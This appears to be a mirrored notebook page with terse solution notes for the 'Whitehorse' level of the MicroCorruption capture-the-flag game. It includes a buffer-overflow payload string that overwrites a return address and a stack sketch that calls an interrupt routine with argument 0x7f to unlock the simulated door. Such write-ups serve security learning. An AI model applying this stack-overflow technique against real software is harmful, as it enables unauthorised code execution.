mirror of
https://git.soft.fish/val/MicroCorruption.git
synced 2024-12-04 08:36:00 +00:00
475 B
475 B
Taken verbatim from my notebook
Page 1
Whitehorse
Password 8-16 chars
it takes 0x30 chars
Jumps to chars 18..20 as addr
ROP chains?
Goal: Set sp to 7f
Call INT
['A';16]32457f
push r14
push r15
push #7f
call INT
mov sp+2, r14 <- prep for call
[INT]00007f
sp sp
Lesson:
Control of the stack means
control of params passed on
the stack